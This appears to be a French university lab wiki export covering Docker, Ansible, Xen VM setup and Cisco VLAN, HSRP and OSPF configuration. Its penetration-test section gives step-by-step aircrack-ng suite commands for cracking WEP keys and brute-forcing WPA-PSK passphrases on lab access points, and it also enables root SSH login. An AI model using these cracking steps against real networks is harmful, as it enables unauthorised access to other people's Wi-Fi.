&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52013</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52013"/>
				<updated>2020-01-05T15:08:39Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Management */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
